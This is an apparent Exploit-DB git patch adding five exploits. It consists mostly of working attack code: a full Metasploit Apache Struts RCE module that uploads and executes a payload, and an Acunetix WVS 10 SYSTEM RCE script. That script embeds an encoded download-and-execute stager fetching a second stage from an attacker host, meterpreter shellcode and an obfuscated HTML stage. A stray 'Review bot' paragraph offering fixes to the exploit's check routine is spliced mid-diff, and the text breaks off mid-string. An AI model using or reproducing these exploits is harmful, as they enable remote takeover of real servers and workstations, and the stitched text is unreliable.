From 28f57d0dbae5631bf90c613dd2681c3cfd2c0641 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 3 May 2016 05:04:01 +0000
Subject: [PATCH] DB: 2016-05-03
5 new exploits
WordPress Ghost Plugin 0.5.5 - Unrestricted Export Download
.Net Framework Execute Native x86 Shellcode
Acunetix WVS 10 - Remote Command Execution (System)
Apache Struts Dynamic Method Invocation Remote Code Execution
QSEE - PRDiag* Commands Privilege Escalation Exploit
---
 files.csv | 5 +
 platforms/android/local/39757.txt | 10 +
 platforms/linux/remote/39756.rb | 190 ++++++++++++
 platforms/php/webapps/39752.txt | 23 ++
 platforms/win32/shellcode/39754.txt | 10 +
 platforms/windows/remote/39755.py | 448 ++++++++++++++++++++++++++++
 6 files changed, 686 insertions(+)
 create mode 100755 platforms/android/local/39757.txt
 create mode 100755 platforms/linux/remote/39756.rb
 create mode 100755 platforms/php/webapps/39752.txt
 create mode 100755 platforms/win32/shellcode/39754.txt
 create mode 100755 platforms/windows/remote/39755.py
diff --git a/files.csv b/files.csv
index b85dffdaa..c27270d9f 100755
--- a/files.csv
+++ b/files.csv
@@ -35964,3 +35964,8 @@ id,file,description,date,author,platform,type,port
 39749,platforms/multiple/dos/39749.txt,"Wireshark - alloc_address_wmem Assertion Failure",2016-04-29,"Google Security Research",multiple,dos,0
 39750,platforms/multiple/dos/39750.txt,"Wireshark - ett_zbee_zcl_pwr_prof_enphases Static Out-of-Bounds Read",2016-04-29,"Google Security Research",multiple,dos,0
 39751,platforms/php/webapps/39751.txt,"GLPi 0.90.2 - SQL Injection",2016-04-29,"High-Tech Bridge SA",php,webapps,80
+39752,platforms/php/webapps/39752.txt,"WordPress Ghost Plugin 0.5.5 - Unrestricted Export Download",2016-05-02,"Josh Brody",php,webapps,80
+39754,platforms/win32/shellcode/39754.txt,".Net Framework Execute Native x86 Shellcode",2016-05-02,Jacky5112,win32,shellcode,0
+39755,platforms/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution (System)",2016-05-02,"Daniele Linguaglossa",windows,remote,0
+39756,platforms/linux/remote/39756.rb,"Apache Struts Dynamic Method Invocation Remote Code Execution",2016-05-02,metasploit,linux,remote,8080
+39757,platforms/android/local/39757.txt,"QSEE - PRDiag* Commands Privilege Escalation Exploit",2016-05-02,laginimaineb,android,local,0
diff --git a/platforms/android/local/39757.txt b/platforms/android/local/39757.txt
new file mode 100755
index 000000000..b7866fab8
--- /dev/null
+++ b/platforms/android/local/39757.txt
@@ -0,0 +1,10 @@
+Sources:
+https://bits-please.blogspot.ca/2016/05/qsee-privilege-escalation-vulnerability.html
+https://github.com/laginimaineb/cve-2015-6639
+
+Qualcomm's Secure Execution Environment (QSEE) Privilege Escalation Exploit using PRDiag* commands (CVE-2015-6639)
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39757.zip
+
diff --git a/platforms/linux/remote/39756.rb b/platforms/linux/remote/39756.rb
new file mode 100755
index 000000000..134d113f1
--- /dev/null
+++ b/platforms/linux/remote/39756.rb
@@ -0,0 +1,190 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Apache Struts Dynamic Method Invocation Remote Code Execution',
+ 'Description' => %q{
+ This module exploits a remote command execution vulnerability in Apache Struts
+ version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code
+ Execution can be performed via method: prefix when Dynamic Method Invocation
+ is enabled.
+ },
+ 'Author' => [ 'Nixawk' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2016-3081' ],
+ [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ]
+ ],
+ 'Platform' => %w{ linux },
+ 'Privileged' => true,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp_uuid'
+ },
+ 'Targets' =>
+ [
+ ['Linux Universal',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux'
+ }
+ ]
+ ],
+ 'DisclosureDate' => 'Apr 27 2016',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(8080),
+ OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']),
+ OptString.new('TMPPATH', [ false, 'Overwrite the temp path for the file upload. Needed if the home directory is not writable.', nil])
+ ], self.class)
+ end
+
+ def print_status(msg='')
+ super("#{peer} - #{msg}")
+ end
+
+ def send_http_request(payload)
+ uri = normalize_uri(datastore['TARGETURI'])
+ res = send_request_cgi(
+ 'uri' => "#{uri}#{payload}",
+ 'method' => 'POST')
+ if res && res.code == 404
+ fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
+ end
+ res
+ end
+
+ def parameterize(params) # params is a hash
+ URI.escape(params.collect { |k, v| "#{k}=#{v}" }.join('&'))
+ end
+
+ def generate_rce_payload(code, params_hash)
+ payload = "?method:"
+ payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS")
+ payload << ","
+ payload << Rex::Text.uri_encode(code)
+ payload << ","
+ payload << Rex::Text.uri_encode("1?#xx:#request.toString")
+ payload << "&"
+ payload << parameterize(params_hash)
+ payload
+ end
+
+ def temp_path
+ @TMPPATH ||= lambda {
+ path = datastore['TMPPATH']
+ return nil unless path
+ unless path.end_with?('/')
+ path << '/'
+ end
+ return path
+ }.call
+ end
+
+ def upload_file(filename, content)
+ var_a = rand_text_alpha_lower(4)
+ var_b = rand_text_alpha_lower(4)
+ var_c = rand_text_alpha_lower(4)
+ var_d = rand_text_alpha_lower(4)
+
+ code = "##{var_a}=new sun.misc.BASE64Decoder(),"
+ code << "##{var_b}=new java.io.FileOutputStream(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_c}[0]))),"
+ code << "##{var_b}.write(##{var_a}.decodeBuffer(#parameters.#{var_d}[0])),"
+ code << "##{var_b}.close()"
+
+ params_hash = { var_c => filename, var_d => content }
+ payload = generate_rce_payload(code, params_hash)
+
+ send_http_request(payload)
+ end
+
+ def execute_command(cmd)
+ var_a = rand_text_alpha_lower(4)
+ var_b = rand_text_alpha_lower(4)
+ var_c = rand_text_alpha_lower(4)
+ var_d = rand_text_alpha_lower(4)
+ var_e = rand_text_alpha_lower(4)
+ var_f = rand_text_alpha_lower(4)
+
+ code = "##{var_a}=@java.lang.Runtime@getRuntime().exec(#parameters.#{var_f}[0]).getInputStream(),"
+ code << "##{var_b}=new java.io.InputStreamReader(##{var_a}),"
+ code << "##{var_c}=new java.io.BufferedReader(##{var_b}),"
+ code << "##{var_d}=new char[1024],"
+ code << "##{var_c}.read(##{var_d}),"
+
+ code << "##{var_e}=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
+ code << "##{var_e}.println(##{var_d}),"
+ code << "##{var_e}.close()"
+
+ cmd.tr!(' ', '+') if cmd && cmd.include?(' ')
+ params_hash = { var_f => cmd }
+ payload = generate_rce_payload(code, params_hash)
+
+ send_http_request(payload)
+ end
+
+ def linux_stager
+ payload_exe = rand_text_alphanumeric(4 + rand(4))
+ path = temp_path || '/tmp/'
+ payload_exe = "#{path}#{payload_exe}"
+
+ b64_filename = Rex::Text.encode_base64(payload_exe)
+ b64_content = Rex::Text.encode_base64(generate_payload_exe)
+
+ print_status("Uploading exploit to #{payload_exe}")
+ upload_file(b64_filename, b64_content)
+
+ print_status("Attempting to execute the payload...")
+ execute_command("chmod 700 #{payload_exe}")
+ execute_command("/bin/sh -c #{payload_exe}")
+ end
+
+ def exploit
+ linux_stager
+ end
+
+ def check
+ var_a = rand_text_alpha_lower(4)
+ var_b = rand_text_alpha_lower(4)
+
+ addend_one = rand_text_numeric(rand(3) + 1).to_i
+ addend_two = rand_text_numeric(rand(3) + 1).to_i
+ sum = addend_one + addend_two
+ flag = Rex::Text.rand_text_alpha(5)
+
+ code = "##{var_a}=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
+ code << "##{var_a}.print(#parameters.#{var_b}[0]),"
+ code << "##{var_a}.print(new java.lang.Integer(#{addend_one}+#{addend_two})),"
+ code << "##{var_a}.print(#parameters.#{var_b}[0]),"
+ code << "##{var_a}.close()"
+
+ params_hash = { var_b => flag }
+ payload = generate_rce_payload(code, params_hash)
+
+ begin
+ resp = send_http_request(payload)
+ rescue Msf::Exploit::Failed
+ return Exploit::CheckCode::Unknown
+ end
+
+ if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}")
+ Exploit::CheckCode::Vulnerable
+ else
+ Exploit::CheckCode::Safe
+ end
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/39752.txt b/platforms/php/webapps/39752.txt
new file mode 100755
index 000000000..7089c9d69
--- /dev/null
+++ b/platforms/php/webapps/39752.txt
@@ -0,0 +1,23 @@
+# Exploit Title: WordPress Export to Ghost Unrestricted Export Download
+# Date: 28-04-2016
+# Software Link: https://wordpress.org/plugins/ghost
+# Exploit Author: Josh Brody
+# Contact: http://twitter.com/joshmn
+# Website: http://josh.mn/
+# Category: webapps
+
+1. Description
+
+Any visitor can download the Ghost Export file because of a failure to check if an admin user is properly authenticated. Assume all versions < 0.5.6 are vulnerable.
+
+2. Proof of Concept
+
+http://example.com/wp-admin/tools.php?ghostexport=true&submit=Download+Ghost+file
+
+File will be downloaded.
+
+3. Solution:
+
+Update to version 0.5.6
+
+https://downloads.wordpress.org/plugin/ghost.0.5.6.zip
\ No newline at end of file
diff --git a/platforms/win32/shellcode/39754.txt b/platforms/win32/shellcode/39754.txt
new file mode 100755
index 000000000..062de696a
--- /dev/null
+++ b/platforms/win32/shellcode/39754.txt
@@ -0,0 +1,10 @@
+# Exploit Title: .Net framework execute native x86 shellcode
+# Date: May. 2nd 2016
+# Exploit Author: Jacky5112 
+# Software Link: https://github.com/jacky5112/ShellCodeTest_Version_1.0
+# Version: 1.0
+# Tested on: Windows
+# CVE : (none)
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39754.zip
+
diff --git a/platforms/windows/remote/39755.py b/platforms/windows/remote/39755.py
new file mode 100755
index 000000000..4fc08a495
--- /dev/null
+++ b/platforms/windows/remote/39755.py
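Review bot: In `check` (platforms/linux/remote/39756.rb), a nil `resp` — no reply at all — falls through to `Exploit::CheckCode::Safe`, so a timeout or connection reset is reported as a verified-safe host, and the same happens for a non-200 reply such as a 500. Adding `return Exploit::CheckCode::Unknown unless resp` before the `if`, and reserving `Safe` for a real reply whose body lacks the `"#{flag}#{sum}#{flag}"` marker, keeps the check result honest. In `temp_path`, `path << '/'` appends to the string returned by `datastore['TMPPATH']` and so mutates the stored option value in place; `path = path.dup` before the append (or `path += '/'`) avoids that side effect. `execute_command` likewise mutates its argument with `cmd.tr!`, which is harmless for the literals passed from `linux_stager` but will surprise any other caller; `cmd = cmd.tr(' ', '+')` is the non-destructive form.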
@@ -0,0 +1,448 @@ +''' +Acunetix WVS 10 - Remote command execution (SYSTEM privilege) + +- Author: Daniele Linguaglossa + +Overview +========= +Acunetix WVS 10 [1] is an enterprise web vulnerability scanner developer by Acunetix Inc. + +Two major flaws exists in the last version of Acunetix, these bug allow a remote attacker, +to execute command in the context of application with SYSTEM privilege. + + +Details +========== +A first flaw exists in the way Acunetix render some html elements inside gui, in fact it +uses jscript.dll without any concert about unsafe ActiveX object such as WScript.shell. +If acunetix trigger a vulnerability during a scan session it saves a local html with the +content of html page, so is possibile to trigger a fake vulnerability and insert a js +which trigger the remote command execution. + +The second flaw it's about the Acunetix scheduler [2], the scheduler just allow to scan +websites programmatically without any user interaction, is possible to schedule scan +via the web interface on 127.0.0.1:8183 . +like any scan Acunetix, will perform some tests on the targeted Host before real scan, +these test are executed upon some script into folder + +C:\ProgramData\Acunetix WVS 10\Data\Scripts + +icacls show a bad privileges in this folder, so any user (even guest) will be able to +replace these custom checks with own ones (Remember first flaw with jscript.dll) :D + +C:\ProgramData\Acunetix WVS 10\Data>icacls Scripts +Scripts Everyone:(OI)(CI)(M) + Everyone:(I)(OI)(CI)(M) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) + BUILTIN\Administrators:(I)(OI)(CI)(F) + CREATOR OWNER:(I)(OI)(CI)(IO)(F) + BUILTIN\Users:(I)(OI)(CI)(RX) + BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA) <---- UNSAFE [3] + +Elaborazione completata per 1 file. 
Elaborazione non riuscita per 0 file + +C:\ProgramData\Acunetix WVS 10\Data> + +With this two flaws in mind i wrote a small exploit which is able to obtain RCE via +a meterpreter shell, anyway there are some requirement: + +1) Target must have VBS script interpreter +2) Target must have the scheduler service +3) Target must be Windows + +Exploit +========== + +https://github.com/dzonerzy/acunetix_0day + +https://www.youtube.com/watch?v=gWcRlam59Fs (video proof) + +Solution +========== + +Jscript should be used with limited ActiveX, and permission on C:\ProgramData\Acunetix WVS 10\Data +must be fixed! + +Footnotes +_________ + +[1] http://www.acunetix.com/ +[2] http://www.acunetix.com/support/docs/wvs/scheduling-scans/ +[3] https://support.microsoft.com/it-it/kb/919240 +''' + +#!/usr/bin/env python +# -*- coding: utf-8 -*- +""" +Acunetix 0day SYSTEM Remote Command Execution by Daniele Linguaglossa + +This PoC exploit 2 vulnerability in Acunetix core , the first one is a RCE (Remote Command Exec) and the second one is +a LPE (Local Privilege Escalation). + +All credits for this exploit goes to Daniele Linguaglossa +""" + +from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer +from random import randint +from threading import Thread +from time import sleep +import binascii +import sys +import base64 +import os + + +server = None + + +def gen_random_name(size): + alphabet = "abcdefghilmnopqrstuvzABCDEFGHILMNOPQRSTUVZ0123456789" + name = "" + for i in range(0, size): + name += alphabet[randint(0, len(alphabet) - 1)] + return name + ".vbs" + + +def ip2b(ip): + return "".join(binascii.hexlify(chr(int(t))) for t in ip.split(".")) + + +def postexploitation(): + print "[*] Sleeping 1 minutes to elevate privileges...ZzZz" + sleep(70) # 2 minutes + global server + print "[!] Stopping server !" + server.shutdown() + print "[!] Exploit successful wait for session!" 
+ +# param URL,FILENAME +PAYLOAD_DOWNLOAD_EXEC = "dHNraWxsIHd2cw0KJGE9JycnDQogU2V0IGZzbyA9IENyZWF0ZU9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmpl" \ + "Y3QiKQ0KIFNldCB3c2hTaGVsbCA9IENyZWF0ZU9iamVjdCggIldTY3JpcHQuU2hlbGwiICkNCiBTZXQgT3V0cCA9IFdz" \ + "Y3JpcHQuU3Rkb3V0DQogU2V0IEZpbGUgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiTWljcm9zb2Z0LlhNTEhUVFAiKQ0K" \ + "IEZpbGUuT3BlbiAiR0VUIiwgImh0dHA6Ly8lcy9zdGFnZTIiLCBGYWxzZQ0KIE15RmlsZSA9IHdzaFNoZWxsLkV4cGFu" \ + "ZEVudmlyb25tZW50U3RyaW5ncyggIiVzIiApKyJcJXMiDQogRmlsZS5TZW5kDQogU2V0IEJTID0gQ3JlYXRlT2JqZWN0" \ + "KCJBRE9EQi5TdHJlYW0iKQ0KIEJTLnR5cGUgPSAxDQogQlMub3Blbg0KIEJTLldyaXRlIEZpbGUuUmVzcG9uc2VCb2R5" \ + "DQogQlMuU2F2ZVRvRmlsZSBNeUZpbGUsIDINCiB3c2hTaGVsbC5ydW4gIndzY3JpcHQgIitNeUZpbGUNCiBmc28uRGVs" \ + "ZXRlRmlsZShXc2NyaXB0LlNjcmlwdEZ1bGxOYW1lKQ0KICcnJw0KICRwdGggPSAoZ2V0LWl0ZW0gZW52OlRFTVApLlZh" \ + "bHVlKyJcc3RhZ2VyLnZicyI7DQogZWNobyAkYSA+ICRwdGgNCiB3c2NyaXB0ICRwdGg=" + +# param connect back IP +PAYLOAD_METERPETRER = "4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000000000" \ + "0000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6" \ + "e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010300e4fb66ef000" \ + "0000000000000e0000f030b01023800020000000e000000000000001000000010000000200000000040000010000000" \ + "020000040000000100000004000000000000000040000000020000463a0000020000000000200000100000000010000" \ + "0100000000000001000000000000000000000000030000064000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e7" \ + "465787400000028000000001000000002000000020000000000000000000000000000200030602e64617461000000" \ + "900a000000200000000c000000040000000000000000000000000000200030e02e6964617461000064000000003000" \ + 
"000002000000100000000000000000000000000000400030c000000000000000000000000000000000b800204000ff" \ + "e090ff253830400090900000000000000000ffffffff00000000ffffffff0000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000009090909090909090909090" \ + "90909090909090909090909090909090909033c0680810400064ff30648920fce8820000006089e531c0648b50308b" \ + "520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b59" \ + "2001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581" \ + "c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89" \ + "001000029c454506829806b00ffd56a0568%s680200115c89e6505050504050405068ea0fdfe0ffd5976a105657689" \ + "9a57461ffd585c0740aff4e0875ece8610000006a006a0456576802d9c85fffd583f8007e368b366a4068001000005" \ + "66a006858a453e5ffd593536a005653576802d9c85fffd583f8007d225868004000006a0050680b2f0f30ffd557687" \ + 
"56e4d61ffd55e5eff0c24e971ffffff01c329c675c7c3bbf0b5a2566a0053ffd5190f4da8a063058eceb8f7b69074c" \ + "4e814a3cae54e8172c60ead9604f2e86b0522895f543ebf148fad021d6146ace15f4ae3dbf55185e896fcaede21b0f" \ + "db55831cbcfb72949f584986c13ebc8dd35971d7cee480354c83bf909ab61c53b4412733e4cd8dc788890915d41c0b" \ + "2e06b529fe28c90a777a1a2ff95dc2a6bd697544d0462c01750e7f053c3ee2e1277d13515df7d3dc5ee57419630faf" \ + "f6c066e12a8ef76cb84891bb64b347b905ceaea1850bc52542cb5a967d538e70d8e7c5335132befb4f87450a5ecdf2" \ + "7ec89b1ed56e6beb044a950a8022ab5d46d5ba6f37655d35296ade2911292b5179f53d148dffee01672f90f1d82c22" \ + "b5e253c2637ed99e71e796953a070483bb13cab540c00873b6f5788a1a6e58663cf9cf2ff46b92cbcdad9215a101fb" \ + "54c71d2112151a19faec99fe5256fced9417f9673ddbb87439860eccedf31e528837cda1251b974f2808bdfc70cafa" \ + "e32fb6335cdda22e19e64fde514b779dc932bb8249f8d8f260fd457b719980bb069a1ed560e2c74d85182c3aacd499" \ + "df5dab0e0a0cee9e1da02cff7b89aac3f99de68badc83c9acf3c7518cf1578a58c131e1f3f36d393a7da0979f48115" \ + "9d687cd9e3d5bc9fe3d34b9c7aa362be497402f21045d1aa7b871e773facc169649d8f64c0ac91d2feb85063169af8" \ + "87973643f41f9b5c38b01cb2eb327e17d1d0f7f5e8693022c729f69b83723df61b9617f533cf919740edbb92ca86f9" \ + "f1db8cdf696531559d41193f2356414df49a8e22790a7cb174079b5273c485e252296d690796649048410e29fc8a4d" \ + "3d3384a98beb5bca12574510183cbaa49f1eee2e7712df55312a40c18e636efe4e7066034e50060e3dcfc5354dc9d9" \ + "4b570a97d0b47eadc715effc165f9660797fc3ed75d5940262419d75ea5670a029774fa83b5818a7d46a9764de62be" \ + "e019444d30589d5d778499aaa0b3d10e7897d26fc5e446eb358c7067df52636d8a2ba7340f40e0c263522bb494500d" \ + "c73585ee9208e29ac7cdf591316712f1624116dc48ebe2c9fa5743e1e4519f82b8be65db56c09e6ef563286050decd" \ + "f9b327481b045b2073ea4e52ba5c6bb066c2f02709effd1db019cba7b8b682f16749d12ca8c89230edbbecfd59bf51" \ + "11ea1e6c9ed24ec62bcc37bff84195329a97a41354be5f297dd0edc868edbd35c528f79b9debf6a132b0ee1c140151" \ + 
"a90f0c6145149b01e6f55b7e6cc24f015a0f98627fee12834bcf368458827c4c824b1968aa4df58188c5909a95df1f" \ + "288c88326ee731d240159bba27397cc8b0fe4995ac6445a9033279af56f156d22416b8915f5b64a1acca60e4c1c6b8" \ + "f33af7431ed674bd62b6b26613cad5f9c9d395c95ee9acc56aacd0f4ea4e198fb6e061d012c91ffa99ecdc1510099f" \ + "8a4d4fc45273e6687be92c729b719692bb5e197083c4f4b77a1df988cd81141686743fe0e1ace050dec96c0fd8d75e" \ + "7182ea3cfc0f13c5cf804a8264c67166495837b6da837bb7e382527f63db2f94c75af6c855162aeb3b8a2c362819b9" \ + "b1d586db76faa0c06346149d2c88379cf186e36056669d4e7cc433cb8205dd0d058c2f6ae74111eeaa6a5883b14e74" \ + "482d130a665e53b6e89020d600be481779ee7b97631b897608d6933c65fcfc4f630dabe2d0dbad0af7c614d81b679d" \ + "619ce6a7eefbf94664a40e4772f540dc1964a979f4c25e125844c2a7075f6a6f5fae46dada35d3e83f82d03f87b11e" \ + "cfb4bf6636d727cf99dae040b8dd3c7abcdb98eabb7e71b56348ce6a3c635299efebc81690288bbab0f6cad2ebfd2a" \ + "a3d7aa74724b97be8ff3f360017970203ed71039a06799828f0455620fe432ef1dbb79cb87478c6d67e177fa72cbc0" \ + "c1422a65197e33ee6a4b314992beb18cbaa3bcd00f43cc2749ed61c8d8cb38f512bee5bdb4d4574c0c56b91da064bd" \ + "5c358dab92d2431b3c90938b4d0ec9661c2e9c98942585466ff7f0a7a5b5b56d825673b46966750cedce33eb0de118" \ + "c5c4211b1bfc6d297d5d48205ac40a8f47b78988807fa9d312465c1c080b158c01267965e443de442716d3fe8ac029" \ + "7640ef6d5632eaa784cf2b2b7a884d0589c93d69f8f8d7c6dc2b75a0825c0c5e892268cf3af3843004dc68dd05d367" \ + "6ac0b218d9adc3ecca734fe7fa61de3272584ed349fffa669175cd8a873b72b7dce3cb4a8e8afa8ddbba2039219220" \ + "6e9dc808a2ac3f2b6909e71321437b8979f26b9a8bda1fde661229544cb34ebc3ce7a4e0c05d340ba65457c67c3d61" \ + "5d249af5d333ab3894045480fa8bb3b6c75a41ed9dd00ec8367c68cd41b2b03caa30fc527a00d94b3c25620813ac9d" \ + "522e6e86cfee45a4f711171ec17f167abc0c4abb6c80de587bb790a1f83b9428d8380832a8216a6b8ea47cac624a24" \ + "ca171c95ebb6d81bd7676eff464d56436d32b66bb3d190e44e66beb412bd7d5d8978d7e0e93bb0e9f08944a6c45b4a" \ + 
"b5e493e0dd1491352d8078b0a3bae30bc2c145bc4e5f9dfd9b457d5dd8ff9c635031b02e7f3b8927b09460b983883a" \ + "dbb42bdff6f8c017b5096ce7d5a72ab620504be21555aa86871ee9e4887657b8e72d8813b429428596839d00c3e44f" \ + "fe5297ce95fc340278d1d805370c54f64615db34797f523f0a4cd2523d10d1a1b62146051db23668bc482d802b66bf" \ + "962f511ec6af7204cbb8d474204bf5c9e52ce0cfbd6298cf96f619a5d64827ba3284b25135965a9062f3cd7eb93745" \ + "390e9cc983c9a54ec731699bbda53958382cbb2e2ecd3247b18e5c3d64755c0d1e112e8375b5795afdfee8b69879c8" \ + "6597f79b6df2624dbe59557e8d13918c2d28c91c3a4f49a8682b62648259d118ffa02b2218efa031b45fd54c0b8d14" \ + "23d494b0a5da8e97ec345e17f9db32e9bec5cbcc36357b4ba8e7b8ccddc192d360d99a1e805dedc0ecadca15a0334f" \ + "680b0a9e91e12698ba69d27d86b2394c3d91682194ba312e8aef801a9ebc8722af9e8bd1180c0eed3137bfe109b06c" \ + "a442777eae4e1a145302152777da0a0a1decef0e0c73f2709cdb61360961eb1fc47cec9a893b9a8b2ec9f5a7fcce3e" \ + "178b459a54d9c5e40c6aada77896a7ee9054324019fe61e954c60dfd7bc895011c951e09fc195e779b71fc33833cdb" \ + "a5fe76ceb9a7b6ba5a39ed2e80c5d91b15cef0e1f5cb956b90e6db947fa45a4ae0e668b72a056dd29ea81c8b3aa126" \ + "b35d40c6dfa042cbd19c42b7ef44e6ef7b35952dbc796097530a04a71a3c116e99bf4a4ae8199685cc7e1e9f03a1ce" \ + "a8eb6d579e1e2ae0800000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + 
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "00000002c3000000000000000000000543000003830000000000000000000000000000000000000000000000000000" \ + "040300000000000000000000040300000000000009c004578697450726f63657373000000003000004b45524e454c3" \ + "3322e646c6c00000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \ + "17aa9f565fccd8ce423701840cda9828320ce06749de816ae27196bce0849d1b494f89ffd49" + +# param CMD => PAYLOAD_DOWNLOAD_EXEC +EXPLOIT_STAGE_1 = "PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjxzY3JpcHQ+d2luZG93LmFsZXJ0ID0genl4O3dpbmRvdy5wcm9tcHQgPSB6eXg7d" \ + "2luZG93LmNvbmZpcm0gPSB6eXg7d2luZG93LmNhbGxlZCA9IDA7ZnVuY3Rpb24genl4KCl7d2luZG93LmNhbGxlZCA9IDE7dm" \ + "FyIHh5ej0iJXMiO2V2YWwoZnVuY3Rpb24ocCxhLGMsayxlLGQpe2U9ZnVuY3Rpb24oYyl7cmV0dXJuIGMudG9TdHJpbmcoMzY" \ + "pfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKXtkW2MudG9TdHJpbmcoYSldPWtbY118fGMudG9TdHJp" \ + "bmcoYSl9az1bZnVuY3Rpb24oZSl7cmV0dXJuIGRbZV19XTtlPWZ1bmN0aW9uKCl7cmV0dXJuJ1xcdysnfTtjPTF9O3doaWxlK" \ + "GMtLSl7aWYoa1tjXSl7cD1wLnJlcGxhY2UobmV3IFJlZ0V4cCgnXFxiJytlKGMpKydcXGInLCdnJyksa1tjXSl9fXJldHVybi" \ + 
"BwfSgnNSAwPTYgNCgiMy4xIik7MC4yKFwnNyAvOCBkIC9lICIiICJjIiAtYiA5IC1hICJmIlwnKTsnLDE2LDE2LCdceDczXHg" \ + "2OFx4NjVceDZjXHg2Y3xceDUzXHg2OFx4NjVceDZjXHg2Y3xceDcyXHg3NVx4NmV8XHg1N1x4NTNceDYzXHg3Mlx4NjlceDcw" \ + "XHg3NHxceDQxXHg2M1x4NzRceDY5XHg3Nlx4NjVceDU4XHg0Zlx4NjJceDZhXHg2NVx4NjNceDc0fHZhcnxuZXd8XHg2M1x4N" \ + "mRceDY0fEN8Tm9ybWFsfFx4NjVceDZlXHg2M1x4NmZceDY0XHg2NVx4NjRceDYzXHg2Zlx4NmRceDZkXHg2MVx4NmVceDY0fH" \ + "dpbmRvd1x4NzNceDc0XHg3OVx4NmNceDY1fFx4NzBceDZmXHg3N1x4NjVceDcyXHg3M1x4NjhceDY1XHg2Y1x4NmN8XHg3M1x" \ + "4NzRceDQxXHg1Mlx4NzR8QnwkJCcucmVwbGFjZSgiJCQiLHh5eikuc3BsaXQoJ3wnKSwwLHt9KSk7ZG9jdW1lbnQuYm9keS5p" \ + "bm5lckhUTUw9JzQwNCBOb3QgZm91bmQnO308L3NjcmlwdD4lczxzY3JpcHQ+aWYgKHdpbmRvdy5jYWxsZWQgPT0gMCl7enl4K" \ + "Ck7fTwvc2NyaXB0PjwvYm9keT48L2h0bWw+" + + +LOGIN_FORM = "PHN0eWxlPg0KYm9keXsNCiAgbWFyZ2luOiAwcHg7DQogIHBhZGRpbmc6IDBweDsNCiAgYmFja2dyb3VuZDogIzFhYmM5ZDsNCn0NCg" \ + 